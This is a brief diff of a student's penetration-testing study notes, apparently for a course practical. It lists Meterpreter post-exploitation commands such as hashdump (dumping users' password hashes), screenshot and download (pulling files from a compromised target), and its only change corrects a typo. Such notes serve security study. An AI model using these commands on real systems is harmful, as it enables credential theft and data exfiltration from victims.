dongyi-guo/my-study/715/prac1.md

 sysinfo # System information
-ipconfig # Network information screenshot # Take a screenshot from target host hasdump # Dump all user's hashes on the screen search -f <filename> # Search file based on name in current directory download <RemotePath> <LocalPath> # Remote download file from target host to local
+ipconfig # Network information screenshot # Take a screenshot from target host hashdump # Dump all user's hashes on the screen search -f <filename> # Search file based on name in current directory download <RemotePath> <LocalPath> # Remote download file from target host to local
 # Remember the path for download command has to be Unix type, for Windows '\',